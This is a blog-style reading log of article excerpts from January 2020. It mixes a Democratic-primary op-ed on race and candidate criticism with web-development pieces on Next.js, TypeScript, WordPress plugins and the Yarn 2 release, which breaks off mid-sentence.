James Reads

Day of Jan 28th, 2020

  • Bernie Bros, Buttigiegers and the Criticism of Candidates

    I fondly remember the days when I was “in the tank” for Bernie Sanders. My time as a shill for Bernie only lasted for a few weeks after I […], which was followed by the time I “[…]” Joe Biden, which was months after I unfairly distorted […]. But, of course, everyone knows I’m secretly working for Donald Trump. Sadly, my tenure as a low-class bully and a […] ended when I recently […] Joe Rogan after the ultimate fighting podcaster announced that he’ll “probably vote for Bernie,” a statement which many, including […], took as an endorsement. Sanders’ legion of supporters and Rogan acolytes quickly disproved my characterization of them as a vicious bearded horde by flooding my inbox and Twitter mentions, bestowing me with titles from “career activist bum” to an “Uncle Tom” who was shilling for “the white muthafuckas.” (My negro senses tell me both insults were from white people. Everyone knows the correct spelling is “muhfuckas” and should never be preceded by the word “the.”) I’ve been called worse. However, the mostly Caucasian “not-all ____” clapback illustrates a common characteristic shared by Bernie Bros, MayorSapiens and even MAGAmuffins. Namely, that any criticism—no matter how valid or accurate—is an ad hominem attack on their preferred presidential candidate meant to destroy their chances of becoming the leader of the free world. We’ve seen the current commander-in-chief do this too many times. Whenever media outlets or individuals point out Trump’s incessant lies, his unyielding ignorance or his perpetual pettiness, he and his minions immediately dismiss the substance of the argument as a conspiratorial plot by “deep state” snowflakes who want to undermine the president’s authority. When Trump retaliates with vile Twitter attacks, progressives cast it as desperation and malevolence. But, if you dare mention Pete’s record on race, it suddenly becomes a meritless smear. What about the facts, though? The truth is that Bernie Sanders often sidesteps institutional racism, instead casting racial disparities as consequences of capitalism and corporate greed. There are instances, including a recent interview with the New York Times editorial board, when it seems as if Sanders is unable to say the words “white supremacy” or “racism.” Sanders’ supporters will insist that economics and systemic racism are inextricably intertwined, a reality that I have reported on extensively. However, Sanders seems all too willing to address issues of class, corporatism and economic inequality without asking white America to take responsibility for the “white” part of white supremacy. The problem with this is manifold—the biggest one being that racial disparities can’t be addressed as an economic issue without specifically focusing on race. White people actually have a higher crime rate and […] more often than black people. But blacks are […] and receive 20 percent longer prison sentences than whites who commit the same crimes, according to the U.S. Sentencing Commission. Poor white schools receive more funding, on average, than even middle-class, majority-black schools. These aren’t class problems. These are race problems. Addressing them as issues of simple economics means that Sanders’ progressive policies could lift poor white people out of poverty while still leaving black people behind. Pete Buttigieg’s plan to address these racial disparities is ambitious and real. However, it is also real that he ignored actual […]. It is also real that South Bend, Ind., spent […] of the city’s contracts budget with black-owned businesses from 2015-2017.
It is also true that there are multiple instances of him disregarding racism to parrot […] when he gets in front of white people. Pete Buttigieg has said all the right things about race since he became a presidential candidate, but highlighting his racial blind spot and the mistakes he made during his mayoral tenure is not an “attack.” Even if his supporters believe he has seen the light or has made positive changes, there are many people who believe that the shit he actually did as mayor is not only important but more relevant to voters than his progressive Negro PowerPoint presentation. Despite Biden’s large constituency of black voters, no one is “hating” on him when they point out his […]; or the […] part of his legislative past; or that he said that he’d consider a […]; or his promise to continue the primary tool in a racist […]; or the fact that he’s a moderate, old white man who keeps acting like a moderate, old white man. Elizabeth Warren used to be a Republican and knows […] like… (Harriet Tubman, Barack Obama and Cardi B). Plus, Warren says she […]. With the buildup over all those years, how can anyone trust that she’s not two-faced? Amy Klobuchar was a prosecutor who […] cops accused of police brutality. Forgive me for stating actual facts. There is no perfect candidate. However, black voters have the right to know the truth and—when it comes to issues of race—they should be able to weigh the pros and the cons. While these candidates’ cons might not necessarily be fatal, it is stupid to dismiss valid criticism as unwarranted attacks. It makes your candidate look weak. Whether it is policy, character defects or repeated blunders, pointing out these blemishes doesn’t mean the candidate is unworthy of the presidency. Pointing out a politician’s blemishes isn’t a call for that particular contender to be canceled, nor is it necessarily an act of advocacy for a different candidate. It’s facts. And none of this helps Donald Trump. Ultimately, most black people are going to vote for whoever emerges as the Democratic nominee. If black voter turnout declines in the 2020 election, it will be because white voters chose a nominee who couldn’t, or didn’t care to, motivate black voters. On the other hand, many of the most vocal white supporters who are rankled by actual facts will turn around and vote for Trump if their candidate does not emerge victorious at the conclusion of the primary season. Yep, we already know that—no matter who the Democrats select—white people are gonna still vote for Donald Trump. The Republican candidate for president has won the white vote in every election in the last 40 years. Even when it comes to white Democrats, […] of Hillary Clinton’s supporters ended up voting for McCain over Obama in 2008. Twelve percent of Bernie’s backers voted for Trump in the 2016 presidential election, according to separate studies. So, when anyone points out Bernie Sanders’ allergy to the word racism or when someone mentions Buttigieg’s racial blind spot, instead of considering it an “attack,” their supporters should either admit that their candidate is flawed or—at the very least—concede that they don’t care about white supremacy as long as they can get Medicare for All. And when Bernie Bros object to being characterized as a bearded, belligerent horde, they should wonder how they gained that reputation. But they should still feel free to call me an Uncle Tom centrist hater who’s a shill for (insert the opposing candidate’s name here) because I’m used to it.
I’ve heard worse things from better white people (the phrase “President Donald Trump,” for instance). Wypipo are forever and always gonna wypipo. Trust me. Even the thundering herd of bearded Bernie Bros in my inbox readily acknowledge that I have unequaled expertise in one specific area: White muhfuckas. Source: Bernie Bros, Buttigiegers and the Criticism of Candidates

    Read at 06:08 pm, Jan 28th

  • Does CSS affect screen readers

    The short and rather vague answer is that screen readers are affected by certain CSS properties. Different screen readers behave differently, and a screen reader might even have several methods of presentation that the user can choose from that alter the effects of CSS.

    Read at 02:45 pm, Jan 28th

  • What went wrong for the municipalists in Spain?

    On May 26, citizens across Spain went to the polls to vote in municipal and European elections. The results were widely seen as a setback to the municipalist wave that swept Spain’s major cities four years prior.

    Read at 02:44 pm, Jan 28th

  • Developers Had City's Ear In Rezoning While Inwood Residents Were Shut Out, Emails Reveal

    Read at 01:31 pm, Jan 28th

  • Min and Max Width/Height in CSS

    Oftentimes, we want to limit the width of an element relative to its parent, and at the same time, to make it dynamic: give the element a base width or height with the ability to extend based on the available space.

    Read at 01:28 pm, Jan 28th

  • Lawmakers want city-controlled transit in wake of Byford’s exit

    Some lawmakers are calling for a city takeover of the state-run MTA’s subway and bus services in the wake of popular transit chief Andy Byford’s resignation Thursday.

    Read at 01:19 pm, Jan 28th

  • NY lawmakers propose real estate tax on investors to boost public housing funds

    ALBANY ― New York lawmakers want to close a legal loophole that allows deep-pocketed real estate investors to avoid paying taxes. Sen.

    Read at 01:18 pm, Jan 28th

  • New York City Stores Must Accept Cash, Council Says

    New York lawmakers passed a bill that puts New York at the forefront of a national movement to ban cashless businesses. From a cup of coffee to a car ride, mobile devices or plastic cards are becoming the preferred, and sometimes exclusive, methods of payment in many parts of the world.

    Read at 01:16 pm, Jan 28th

  • Bernie Can’t Win

    “Left but not woke” is the Bernie Sanders brand. If anybody failed to recognize it before, nobody can miss it now. Last week, the mega-podcaster Joe Rogan endorsed Sanders. The Sanders campaign tweeted a video of the Rogan endorsement from Sanders’s own account.

    Read at 01:09 pm, Jan 28th

  • Cuomo’s Recipe to Plug $6B Budget Hole: Everyone Shares Medicaid Pain

    Gov. Andrew Cuomo on Tuesday proposed a $178.6 billion state budget for the upcoming fiscal year that seeks to close a $6 billion budget gap.

    Read at 12:52 pm, Jan 28th

  • John Roberts Can Call Witnesses to Trump’s Trial. Will He?

    Democratic House managers should ask the chief justice to issue subpoenas for John Bolton and others. Mr. Katyal and Mr. Geltzer are law professors at Georgetown. Mr. Edwards is a former Republican congressman from Oklahoma.

    Read at 12:48 pm, Jan 28th

  • 'They let him get away with murder': Dems tormented over how to stop Bernie

    With Bernie Sanders gaining steam a week before the Iowa caucuses, tormented Democrats are second-guessing what they say was a hands-off strategy against the Vermont senator in the 2020 primary.

    Read at 06:05 am, Jan 28th

Day of Jan 27th, 2020

  • https://revolutionsperminute.simplecast.com/episodes/socialist-city-council-white-house-w-jabari-brisport-CbH_QMAp

    Read at 07:16 pm, Jan 27th

  • 5 Things I Love About My Website Built with Next.js ― Scotch.io

    This site is home to certain tech and web dev goodies that make me very happy. This post is about what they are, and how they work. While most websites these days come with some type of dark/light mode toggle switch, I serve you content based on the setting that you've set on your system: if you use your phone/computer in dark mode, you get dark mode. If you use it in light mode, you get light mode. This is made possible by the powerful prefers-color-scheme media query in CSS (see the sketch after this excerpt for the idea). This website is built with React and ZEIT's popular framework Next.js, which honestly is such a dream to work with. 😍 Next.js' opinionated-ness as a framework takes a lot of the mental overhead of structuring things away from me and, in many ways, "just works". What's even better is it's all magically ✨ server-rendered out-of-the-box, without extra work from me so search engines can pick it up and people can find it! Server Rendering What is server rendering? It's when a site is "rendered" (think, drawn) on the server and then delivered to a browser. This way, you get the content immediately from a server. This is a bit different than how many websites work on the web today. If you've ever opened up a website and seen spinners immediately before your content, it's quite likely that it was not server rendered: it was "drawn" (or rendered) in your browser (AKA the client, AKA not a server). The benefits of server-rendering for me: you get your content immediately, instead of spinners; search engines can read it more easily; and there's no jumpy, possibly unpredictable behavior: if you load a non-server-rendered, spinner-driven website on a train, or somewhere with intermittent internet, the user experience could end up in some strange, unpredictable state. This risk doesn't quite exist with server rendering. Next.js gives me all of this for free, without having to do anything. Deployment IT GETS BETTER! Using another product from ZEIT called now, I'm able to upload this site to the internet magically by running one command. And just like that, tejaskumar.com is up-to-date with the latest blog post and can scale infinitely and handle billions of readers at any given time. What a time to be alive. 😍 I've tried to keep this website playful and whimsical, with the silly photos of me and odd nicknames. I feel like we can all sometimes get too serious. I'd like my little corner of the internet to be fun and not so langweilig (boring). I even created a mouseover effect to mimic the macOS dock in CSS just for fun because why not. Let's make it playful and fun. If you have ideas for ways we can continue to boost the whimsy of this website, let me know on twitter and it could be a cool collaboration between us! 😄 "Working on a <ConfettiGeyser> component for my React Europe Whimsy Workshop :D this one'll be a ton of fun to build. pic.twitter.com/JlTMUWaxad" — 🌈 Josh (@JoshWComeau) May 9, 2019 I really appreciate Josh Comeau and the things he creates because they're creative and beautiful. It's this kind of flair/vibe that I appreciate on the web. I've had a number of conversations that go like this: I'm starting a blog. What stack should I choose? What should my backend be? 🤔 I've had this conversation with myself often. As with most things, I'd like to employ the KISS (Keep It Simple and Spectacular) principle. I'm a huge fan of the JAMStack: the JavaScript, APIs, Markup stack.
That's entirely how this site works: There are a number of different backends I could use. I could even go "backendless" and have everything be statically generated using Gatsby or similar. Why do I choose a GitHub backend? I'm glad you asked. The source code lives on GitHub. Like... it's there. A database is essentially a folder containing files and things in a certain structure. There's no real reason my blog folder couldn't be a database. It seems like the simplest solution. There are limitations, but they don't matter much to me. Static build time. This blog has 3 posts on it at the time of writing. 3. Three. T h r e e. Drei. That's not a lot. But, when building something, I think of scenarios where it could have 3,000,000. "Curious: what are y'all's thoughts on using a static site generator (maybe like @gatsbyjs?) at scale? Say for example I have a project with 150k-200k articles. What are your thoughts, concerns, etc. about this in terms of build time and deployment?" — Tejas Kumar (@TejasKumar_) May 13, 2019 In this case, a static site could theoretically take a looooooong time (https://twitter.com/monicalent/status/1128030476780937217) to build, which could be problematic. This is the reason I have not chosen a static site generator. I love client/server because it scales better and allows more clearly defined, non-blocking boundaries between components. Enforced transferrable writing. Realistically, GitHub has a rate limit. I think it caps out at 5K requests per hour (please don't DDoS me). At some point, I might have to move my blog post writings out of this GitHub repository and somewhere else. How hard will this migration be? Copy. Paste. It's all text. Literally, it's all markdown (https://github.com/TejasQ/tejaskumar.com/blob/master/blog/1579543554591__5-things-i-love-about-my-website.md). The images are externally hosted and can be polyfilled, but besides that, it's text. I can copy these files to any other backend that supports, well, text, and nobody will be able to tell anything changed. Having GitHub as my API enforces me writing this way (transferably) and I love it! In case I outgrow the GitHub backend, I'd consider Fauna (https://fauna.com/) or similar as a DB. It supports text. Did Tejas build this site? Kind of. Tejas built this with these wonderful people. It's a team effort! This website is community driven. "📣 I have some stuff I want to add to my website. I would like to help underrep'd people in tech and/or newcomers. Let's build these together! 🙌🏾 1) 🍔 Burger menu for mobile 2) 🎙 Talks section 👨🏾‍💻 If you want to learn to code, please reach out. I want to help you succeed." — TeJAMStack (@TejasKumar_) January 16, 2020 I also have a list of developers I plan to collaborate with in the near future. This list is composed of people with varying backgrounds (beginners through experts) and usually from underrepresented groups in tech. It's an honor and a privilege to use my little corner of the web as a platform to help others in the tech industry as it grows increasingly beautiful each day. Ah, writing all this reminds me how much I have to be thankful for. brb Like this article?
Follow @TejasKumar_ on Twitter Source: 5 Things I Love About My Website Built with Next.js ― Scotch.io
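The prefers-color-scheme code sample the excerpt references didn't survive extraction. As a minimal sketch of the same idea, here is the media query read from TypeScript via matchMedia (the data-theme attribute is illustrative, not from the post; the original presumably did this in pure CSS):

const darkQuery = window.matchMedia("(prefers-color-scheme: dark)");

function applyTheme(isDark: boolean): void {
  // Swap a theme attribute; a real site might toggle CSS custom properties instead.
  document.documentElement.dataset.theme = isDark ? "dark" : "light";
}

applyTheme(darkQuery.matches); // match the OS setting on first paint
darkQuery.addEventListener("change", (e) => applyTheme(e.matches)); // follow live changes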

    Read at 06:49 pm, Jan 27th

  • James Meneghello

    Hello! What's your background and what do you do? I’m currently the Engineering Manager at InterExchange, a non-profit for cultural exchange.

    Read at 03:48 pm, Jan 27th

  • What a Socialist Approach to Gun Violence Should Look Like

    We’re thankfully beginning to see mass organizing and protest against the epidemic of gun violence in the United States.

    Read at 02:53 pm, Jan 27th

  • Adding special values to types in TypeScript

    One way of understanding types is as sets of values. Sometimes there are two levels of values: base-level values and special values that exist in addition to them. In this blog post, we examine how we can add special values to base-level types.
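For intuition, a minimal sketch of the idea in TypeScript (the names Color, NONE and parseColor are illustrative, not from the post):

// A base-level type...
type Color = "red" | "green" | "blue";

// ...extended with a special value. A unique symbol cannot collide with
// any base-level value; null or undefined would work similarly.
const NONE = Symbol("none");
type ColorOrNone = Color | typeof NONE;

function parseColor(text: string): ColorOrNone {
  return text === "red" || text === "green" || text === "blue"
    ? (text as Color)
    : NONE;
}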

    Read at 02:30 pm, Jan 27th

  • TypeScript enums: How do they work? What can they be used for?

    JavaScript has one type with a finite number of values: boolean, which has the values true and false and no other values. With enums, TypeScript lets you define similar types statically yourself. The entries No and Yes are called the members of the enum NoYes, shown below.
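A minimal reconstruction of that enum (the defining code block didn't survive extraction; the original post may also give the members explicit values):

// No and Yes are the members of the enum NoYes.
enum NoYes {
  No,
  Yes,
}

const answer: NoYes = NoYes.Yes; // members are accessed through the enum name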

    Read at 02:27 pm, Jan 27th

  • The Billionaires Are Getting Nervous

    Bill Gates and others warn that higher taxes would lead to lower growth. They have their facts backward. The editorial board is a group of opinion journalists whose views are informed by expertise, research, debate and certain longstanding values. It is separate from the newsroom.

    Read at 01:44 am, Jan 27th

  • Choosing the best folder structure for your React application

    As we all probably already know, unlike Angular, where we already have a predefined way of structuring files, in React, that burden, or gift, depending on how you look at it — is bestowed upon us, the valiant developers. Now, I choose to look at this as a gift. And let me explain why.

    Read at 01:31 am, Jan 27th

Day of Jan 26th, 2020

  • 10up Releases Autoshare for Twitter WordPress Plugin – WordPress Tavern

    On Tuesday, 10up released its Autoshare for Twitter plugin. The plugin is designed to automatically tweet blog posts as they are published. By default, it will send the post title, featured image, and link to Twitter. Users can also add a custom message. The plugin is available in the WordPress plugin directory. If you threw a rock into a crowd of WordPress plugins, you would likely smack a social-networking extension. The WordPress plugin market is crowded with similar plugins, so it would make sense if this one flew under the radar. Plus, powerhouse plugins like Jetpack provide similar functionality, such as the Jetpack Publicize feature. Yet, with the prevalence of similar plugins, Autoshare for Twitter is worth checking out. Many similar plugins work with multiple social networks, but 10up's plugin is designed specifically for sharing via Twitter. For users who only need a solution for that specific social network, it is a solid solution for version 1.0. 10up originally built the plugin to provide the company's clients more control and customization than they found in existing solutions. "Recognizing its widespread potential, we decided to follow our own best practices for managing open-source software by releasing it as a free plugin on the official WordPress plugin repository," wrote Jeff Paul, Associate Director of Open Source Initiatives at 10up. The plugin works with both the block and classic editors. When in use with the block editor, it is added as part of the pre-publish check system, as shown in a screenshot of the pre-publish check for tweeting a post. The custom message box tracks the number of characters so that users do not go over Twitter's character count. The plugin also displays a message in the Status & Visibility panel to let users know if a post was shared on Twitter. Overall, the plugin does its job well (sorry to folks who were bombarded with some test tweets earlier). It would be nice to see similar one-off solutions that are specific to other social networks. I often find myself in need of such plugins without dealing with a full array of social networking options. The plugin is also available on GitHub for others to contribute. Currently, there are several open issues that would improve how the plugin works. Setup Is Not User-Friendly The biggest downside to the plugin is that there are no links, no admin help tab, and no instructions on how to set up the Twitter credentials on the plugin's settings screen. The page simply has some text fields for things like an API Key, API Secret, and so on. These are not user-friendly terms, and will likely be confusing for many. Not to mention, similar plugins can connect users at the click of a button. For a plugin that does nearly everything else right, this is a missing piece of what would be a near-perfect release. The plugin is ideal for power users or developers who want to set up Twitter sharing for a client. In the current version of the plugin, users need to set up a Twitter Developer account and create a Twitter App. This generates the API keys and necessary tokens for using the plugin. The plugin does have an open ticket on GitHub for a better onboarding process, which could solve this issue; the team is aware of it and actively working on making this smoother in a future version. Source: 10up Releases Autoshare for Twitter WordPress Plugin – WordPress Tavern

    Read at 03:43 pm, Jan 26th

  • Introducing Storybook Design System

    Storybook is the most popular component explorer on the planet. It’s used by 20,000+ GitHub projects and maintained by over 700 contributors. As the team and project scale, new UI challenges are unearthed. More developers means higher communication overhead.

    Read at 03:25 pm, Jan 26th

  • Memory Leaks Demystified

    Tracking down memory leaks in Node.js has been a recurring topic; people are always interested in learning more about it due to the complexity and the range of causes.

    Read at 03:20 pm, Jan 26th

  • JavaScript tree shaking, like a pro - Daniel Brain - Medium

    Source: JavaScript tree shaking, like a pro – Daniel Brain – Medium

    Read at 03:17 pm, Jan 26th

  • Monitoring Node.js: Watch Your Event Loop Lag!

    If you ask any Node.js developer for their number one performance tip, chances are close to a hundred percent that they will give you the following advice: Avoid synchronous work. Why is synchronous work bad? Because in Node.js, there is only a single thread.
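A minimal sketch of what watching event-loop lag can look like in practice (interval and threshold are illustrative; this is not the article's code):

// Schedule a timer and measure how late it actually fires. Synchronous
// work blocking the single thread shows up as lag on the next tick.
const INTERVAL_MS = 500;
let last = Date.now();

setInterval(() => {
  const now = Date.now();
  const lag = now - last - INTERVAL_MS; // how late this tick fired
  last = now;
  if (lag > 50) {
    console.warn(`event loop lag: ${lag} ms`);
  }
}, INTERVAL_MS);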

    Read at 02:21 pm, Jan 26th

  • An Ecosocialist Green New Deal: Guiding Principles

    Humankind has reached a moment of existential crisis. Human activity is causing disastrous climate disruption and Earth’s sixth mass extinction event, triggering critical losses of biodiversity.

    Read at 04:37 am, Jan 26th

  • Gutenberg 7.2 Adds Long-Awaited Multi-Button Block and Gallery Image Size Option

    The Gutenberg team released version 7.2 of the plugin yesterday after a four-week release hiatus for the holidays. This update includes at least 180 pull requests to the project’s repository by 56 contributors.

    Read at 04:02 am, Jan 26th

  • Olav Stetter

    Hello! What's your background and what do you do? Hi! My name is Olav, and I’m the Head of Data Science at KONUX, an IoT/AI startup based in Munich that enables intelligent infrastructure for the rail industry.

    Read at 12:17 am, Jan 26th

  • How the Health Insurance Industry (and I) Invented the ‘Choice’ Talking Point

    It was always misleading. Now Democrats are repeating it. Mr. Potter is a former insurance executive.

    Read at 12:07 am, Jan 26th

Day of Jan 25th, 2020

  • Can the Block Directory and Business Interests Coexist?

    WordPress.org is not an official marketplace for plugins and themes. Except for some plugins that are strictly SaaS products, all extensions to the platform are publicly available for the low cost of $0. Despite not directly selling through WordPress.

    Read at 11:55 pm, Jan 25th

  • Redux is half of a pattern (1/2)

    Redux is fantastic. Some of you might disagree, so let me tell you why.

    Read at 11:43 pm, Jan 25th

  • Building LightOS with React Native

    The Light Phone 2 is a minimalist cellphone that was named one of Time Magazine’s best inventions of 2019. In early 2018, we joined Light to build the operating system and supporting software stack, namely the “LightOS”. Light is a radically different technology company.

    Read at 04:30 pm, Jan 25th

  • The Sanders Campaign Researched Whether Warren Could Be Both Vice President and Treasury Secretary at Once

    The presidential campaign of Sen. Bernie Sanders has researched the question of whether the same person can serve as both vice president and treasury secretary, according to three sources on the campaign. The person the Sanders campaign had in mind with the inquiry was Sen. Elizabeth Warren.

    Read at 05:07 am, Jan 25th

  • The Deal with the Section Element

    Two articles published the exact same day: Bruce Lawson on Smashing Magazine: Why You Should Choose HTML5 <article> Over <section>; Adam Laki on Pine: The Difference Between <section> and <div>

    Read at 05:02 am, Jan 25th

  • The Difference Between <section> and <div> Element

    The <div> is one of the most generic elements in HTML, but is it okay to always use it? Well, it depends on our needs, because nowadays we have more elements with meaning.

    Read at 05:01 am, Jan 25th

  • The Third Rail of Calling ‘Sexism’

    For a year on the presidential campaign trail, Elizabeth Warren has tried very hard to not have the kind of conversation about sexism that can be messy for candidates, but this week, in a fight with her ideologically closest Democratic competitor, those efforts exploded in her face.

    Read at 04:59 am, Jan 25th

  • Should you get the Node.js Certification?

    A few months ago, the Node.js Certification by the OpenJS Foundation was announced. This was big news for the community and the Node.js ecosystem! The launch of the certification prompted a lot of responses and reactions.

    Read at 04:43 am, Jan 25th

  • Blogged Answers

    Both of these assumptions are incorrect, and I want to clarify how they actually work so that you can avoid mis-using them in the future.

    Read at 04:40 am, Jan 25th

  • Frozen In Time

    It was June 1974. The Cold War was verging on détente, though the Watergate scandal overshadowed the Moscow Summit between President Richard Nixon and his Soviet Union counterpart, Leonid Brezhnev.

    Read at 04:37 am, Jan 25th

  • One Year in Washington

    This article was featured in One Great Story, New York’s reading recommendation newsletter. Sign up here to get it nightly.

    Read at 03:55 am, Jan 25th

Day of Jan 24th, 2020

  • Dual Power Then and Now: From the Iroquois to Cooperation Jackson

    Long before the concept of dual power was used by Lenin to refer to the power of the workers’ councils vis-à-vis the state in the Russian revolution, and before Bookchin identified its potential as “as a blueprint for the revolutionary transformation of society,” practices that are now common

    Read at 11:50 pm, Jan 24th

  • Min and Max Width/Height in CSS | CSS-Tricks

    Direct Link → Here's a nice deep dive into min-width / min-height / max-width / max-height from Ahmad Shadeed. I like how Ahmad applies the properties to real-world design situations in addition to explaining how it works. In the very first demo, for example, he shows a button where min-width is used as a method for (trying to) make sure a button has space on its sides. It works if the text is short enough, and fails when the text is longer. That's the kind of "CSS thinking" that is fundamental to this trade. Source: Min and Max Width/Height in CSS | CSS-Tricks

    Read at 10:01 pm, Jan 24th

  • Introducing Yarn 2 ! 🧶🌟 - DEV Community 👩‍💻👨‍💻

    Hi everyone! After exactly 365 days of very intensive development, I'm extremely happy to unveil the first stable release of Yarn 2. In this post I will explain what this release will mean for our community. Buckle up! If you're interested to know more about what will happen to Yarn 1, keep reading as we detail our plans later down this post: Future Plans. If you just want to start right now with Yarn 2, check out the Getting Started or Migration guides. Release Overview Describing this release is particularly difficult - it contains core, fundamental changes, shipped together with new features born from our own usage. The highlights are only a subset of all the changes and improvements; a more detailed changelog can be found here, and the upgrade instructions are available here. Frequently Asked Questions Who should we thank for this release? A significant amount of work has been done by larixer from SysGears, who crawled deep into the engine with the mission to make the transition to Yarn 2 as easy as possible. In particular he wrote the whole node_modules compatibility layer, which I can tell you is no easy feat! My thanks also go to everyone who spontaneously joined us for a week or a month during the development. In particular embraser01 for the initial Windows support, bgotink for typing our filesystem API, deini for his contributions to the CLI, and Daniel for his help on the infrastructure migration. This work couldn't have been possible without the support from many people from the open-source community - I think in particular to Nicolò from Babel and Jordan from Browserify, but they're far from being the only ones: the teams of Gatsby, Next, Vue, Webpack, Parcel, Husky, ... your support truly made all the difference in the world. And finally, the project lead and design architect for Yarn 2 has been yours truly, Maël Nison. My time was sponsored in large part by Datadog, which is a super dope place to develop JS (which is hiring 😜), and by my fiancé and our cats. Never forget that behind all open-source projects are maintainers and their families. How easy will it be to migrate to Yarn 2? Thanks to our beta testers and the general support of the ecosystem we've been able to soften much of the pain associated with such a major upgrade. A Migration Guide is available that goes into more detail, but generally speaking as long as you use the latest versions of your tools (ESLint, Babel, TypeScript, Gatsby, etc), things should be fine. One particular caveat however: Flow and React-Native cannot be used at the moment under Plug’n’Play (PnP) environments. We're looking forward to working with their respective teams to figure out how to make our technologies compatible. In the meantime you can choose to remain on Yarn 1 for as long as you need, or to use the node_modules plugin, which aims to provide a graceful degradation path for smoother upgrade (note that it's still a work in progress - expect dragons). More details here. If you don't want to upgrade all of your projects, just run yarn policies set-version ^1 in the repositories that need to stay on Yarn 1, and commit the result. Yarn will always prefer the checked-in binaries over the global ones, making it the best way to ensure that everyone in your team shares the exact same release! What will happen to the legacy codebase? Yarn 1.22 will be released next week.
Once done, the 1.x branch will officially enter maintenance mode - meaning that it won't receive further releases from me except when absolutely required to patch vulnerabilities. New features will be developed exclusively against Yarn 2. In practical terms: The legacy repository (yarnpkg/yarn) will move over to yarnpkg/legacy to reflect its maintenance status. It will be kept open for the time being, but we'll likely archive it in a year or two. The modern repository will not be renamed into yarnpkg/yarn, as that would break a significant amount of backlink history. It will remain yarnpkg/berry for the foreseeable future. The old website will move over to legacy.yarnpkg.com, and the new website (currently next.yarnpkg.com) will be migrated to the main domain name. The yarn package on npm will be updated as such: The berry tag will always point towards the latest 2.x release. The legacy tag will always point towards the latest 1.x release. The latest tag will be an alias for legacy for a few weeks, then will switch to berry. This dance is required to give everyone the time to pin their Yarn versions in case their applications aren't compatible with Yarn 2. The Node Docker image will likely start shipping Yarn 2 starting from Node 14, expected in April 2020. Until then you can safely use yarnPath to seamlessly use Yarn 2 on all Node images with little changes to your configuration. We're moving to a fully automated GitHub Actions workflow and some OS registries (in particular Homebrew, Chocolatey, etc) haven't been implemented yet. As a result they might receive the Yarn 2 update later than the others. In the meantime, yarn set version (or yarn policies set-version on Yarn 1) is the recommended way to handle upgrades. We expect most of those changes to be completed by February 1, 2020. In Depth CLI Output Back when Yarn was released its CLI output was a good step forward compared to other solutions (plus it had emojis! 🧶), but some issues remained. In particular lots of messages were rather cryptic, and the colours were fighting against the content rather than working with it. Strong from this experience, we decided to try something different for Yarn 2: Almost all messages now have their own error codes that can be searched within our documentation. Here you'll find comprehensive explanations of the in-and-outs of each message - including suggested fixes. The colours are now used to support the important parts of each message, usually the package names and versions, rather than on a per-line basis. We expect some adjustments to be made during the following months (in particular with regard to colour blindness accessibility), but over time I think you'll come to love this new display! Workspace-aware CLI Working with workspaces can sometimes be overwhelming. You need to keep the state of your whole project in mind when adding a new dependency to one of your workspaces. "Which version should I use? What’s already used by my other workspaces?", etc. Yarn now facilitates the maintenance of such setups through various means: yarn up <name> will upgrade a package in all workspaces at once; yarn add -i <name> will offer to reuse the same version as the ones used by your other workspaces (and some other choices); the version plugin will give you a way to check that all the relevant workspaces are bumped when one of them is released again. Those changes highlight the new experience that we want to bring to Yarn: the tool becomes an ally rather than a burden.
Zero-Installs While not a feature in itself, the term "Zero Install" encompasses a lot of Yarn features tailored around one specific goal - to make your projects as stable and fast as possible by removing the main source of entropy from the equation: Yarn itself. To make it short, because Yarn now reads the vendor files directly from the cache, if the cache becomes part of your repository then you never need to run yarn install again. It has a repository size impact, of course, but on par with the offline mirror feature from Yarn 1 - very reasonable. For more details (such as "why is it different from checking in the node_modules directory"), refer to this documentation page. New Command: yarn dlx Yarn 2 introduces a new command called yarn dlx (dlx stands for download and execute) which basically does the same thing as npx in a slightly less dangerous way. Since npx is meant to be used for both local and remote scripts, there is a decent risk that a typo could open the door to an attacker: $ npx serv # Oops, should have been "serve" This isn't a problem with dlx, which exclusively downloads and executes remote scripts - never local ones. Local scripts are always runnable through yarn run or directly by their name: $ yarn dlx terser my-file.js $ yarn run serve $ yarn serve New Command: yarn workspaces foreach Running a command over multiple repositories is a relatively common use case, and until now you needed an external tool in order to do it. This isn't the case anymore as the workspace-tools plugin extends Yarn, allowing you to do just that: $ yarn workspaces foreach run build The command also supports options to control the execution which allow you to tell Yarn to follow dependencies, to execute the commands in parallel, to skip workspaces, and more. Check out the full list of options here. New Protocol: patch: Yarn 2 features a new protocol called patch:. This protocol can be used whenever you need to apply changes to a specific package in your dependency tree. Its format pairs the patched package's descriptor with the path to a patch file. Together with the resolutions field, you can even patch a package located deep within your dependency tree. And since the patch: protocol is just another data source, it benefits from the same mechanisms as all other protocols - including caching and checksums! New Protocol: portal: Yarn 2 features a new protocol called portal:. You can see portal: as a package counterpart of the existing link: protocol. Where the link: protocol is used to tell Yarn to create a symlink to any folder on your local disk, the portal: protocol is used to create a symlink to any package folder. So what's the difference you say? Simple: portals follow transitive dependencies, whereas links don't. Even better, portals properly follow peer dependencies, regardless of the location of the symlinked package. Workspace Releases Working with workspaces brings its own bag of problems, and scalable releases may be one of the largest ones. Most large open-source projects around here use Lerna or a similar tool in order to automatically keep track of changes applied to the workspaces. When we started releasing the beta builds for Yarn 2, we quickly noticed we would be hitting the same walls. We looked around, but existing solutions seemed to have significant requirements - for example, using Lerna you would have to either release all your packages every time, or to keep track yourself of which packages need to be released.
Some of that work can be automated, but it becomes even more complex when you consider that a workspace being released may require unrelated packages to be released again too (for example because they use it in their prepack steps)! To solve this problem, we've designed a whole new workflow available through a plugin called version. This workflow, documented here, allows you to delegate part of the release responsibility to your contributors. And to make things even better, it also ships with a visual interface that makes managing releases a walk in the park! This workflow is still experimental, but it works well enough for us that we think it'll quickly prove an indispensable part of your toolkit when building large projects using workspaces. Workspace Constraints Workspaces quickly proved themselves to be one of our most valuable features. Countless projects and applications switched to them over the years. Still, they are not flawless. In particular, it takes a lot of care to keep the workspace dependencies synchronized. Yarn 2 ships with a new concept called Constraints. Constraints offer a way to specify generic rules (using Prolog, a declarative programming language) that must be met in all of your workspaces for the validation to pass. For example, the following will prevent your workspaces from ever depending on underscore - and will be autofixable! gen_enforced_dependency(WorkspaceCwd, 'underscore', null, DependencyType) :- workspace_has_dependency(WorkspaceCwd, 'underscore', _, DependencyType). This other constraint will require that all your workspaces properly describe the repository field in their manifests: gen_enforced_field(WorkspaceCwd, 'repository.type', 'git') :- workspace(WorkspaceCwd). gen_enforced_field(WorkspaceCwd, 'repository.url', 'ssh://git@github.com/yarnpkg/berry.git') :- workspace(WorkspaceCwd). Constraints are definitely one of our most advanced and powerful features, so don't fret yourself if you need time to wrap your head around it. We'll follow up with blog posts to 